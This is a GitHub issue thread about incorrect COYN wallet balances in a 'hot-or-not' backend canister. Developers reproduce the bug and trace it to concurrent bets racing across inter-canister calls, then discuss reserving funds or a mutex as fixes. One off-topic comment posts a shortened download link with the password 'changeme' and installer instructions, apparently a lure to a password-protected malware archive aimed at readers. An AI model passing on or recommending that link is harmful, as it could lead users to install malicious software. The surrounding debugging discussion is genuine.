### ISSUE TITLE
COYN balance showing up incorrectly

### ISSUE THREAD

**Issue by harshitasrivastav28** [go-bazzinga/hot-or-not-backend-canister#378]
Hi team,

Getting multiple user complaints that COYN balance in Wallet is reflecting incorrectly.
Can we please urgently look into this.

Attaching screenshot for reference

![Image](https://github.com/user-attachments/assets/dc719686-1799-494b-a574-1b5bb5647c7b)

![Image](https://github.com/user-attachments/assets/0740fc66-03f3-41dd-b178-84083dbc9451)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by harshitasrivastav28** [comment]
@abeeshake-yral Can you please share the findings here?

**Comment by abeeshake-yral** [comment]
![image](https://github.com/user-attachments/assets/23c2a733-fc29-4abe-8034-b4fffb439ea3)
![image](https://github.com/user-attachments/assets/6ad7b8e1-a2a6-4c20-b157-07efc7d760de)
![image](https://github.com/user-attachments/assets/bedffdb8-a6ea-43e4-8cf8-efc7f37ae8a0)


These are the panics from the chrome console when loading the wallet page.

**Comment by harshitasrivastav28** [comment]
- Not happening now and we are unable to reproduce it either on mobile or on web.

**Comment by harshitasrivastav28** [comment]
This is reproducible. This is happening when user doesn't have sufficient COYN balance but keeps voting.
Steps to reproduct: Keep voting on the videos without waiting for result, see your wallet balance. @komal-rs @abeeshake-yral

**Comment by abeeshake-yral** [comment]
Can confirm the reproduction of the issue as suggested by @harshitasrivastav28 !

**Comment by abeeshake-yral** [comment]
Could this be a concurrency issue @komal-rs ? This happens when the user keeps placing votes and moves on without waiting for the 'bet to be placed'. 
In other words, the 'spinner' on the frontend keeps spinning and the user moves on.

If I do this enough number of times, such that placed bet amount > my coin balance => the random number shows up.

**Comment by komal-rs** [comment]
yes very likely a concurency issue

**Comment by abeeshake-yral** [comment]
do we go the 'mutex' route for placing bets then?

**Comment by komal-rs** [comment]
So we need to understand concurrency in canisters. I know it is single threaded but maybe it there is context switch when doing API calls, etc

**Comment by abeeshake-yral** [comment]
[token_event_balance](https://github.com/go-bazzinga/hot-or-not-backend-canister/blob/285565f79c94abddaab3379d12d75fae44d8c342/src/canister/individual_user_template/src/api/hot_or_not_bet/bet_on_currently_viewing_hot_or_not_post.rs#L68)


```mermaid
graph LR
    A[add_post_v2] -- fast operation --> B(validate_incoming_bet)
    B -- slow operation (bet1) --> C(receive_bet_from_makers_canister)
    B -- slow operation (bet2) --> D(receive_bet_from_makers_canister)
    C --> E(token_event_balance)
    D --> E

```

**Comment by abeeshake-yral** [comment]
so, either we deduct the amount (as a reserve) before the receive_bet_from_makers_canister or use some form of mutex / semaphore (ongoing_bet = true).

**Comment by komal-rs** [comment]
Best practices from ICP regarding this issue - https://internetcomputer.org/docs/current/developer-docs/security/security-best-practices/inter-canister-calls#recommendation-1

**Comment by harshitasrivastav28** [comment]
- To quantify the impact of the bug, can we add it in user attributes in big query to get an understand of COYN balance

**Comment by abeeshake-yral** [comment]
- bigquery event - add user balance to event
- how many users have >1bn balance? how many were affected?
- approach = validate_bet => reduce the token balance.

**Comment by Natasha-GB** [comment]
- Local testing in progress
- ETA by today eod
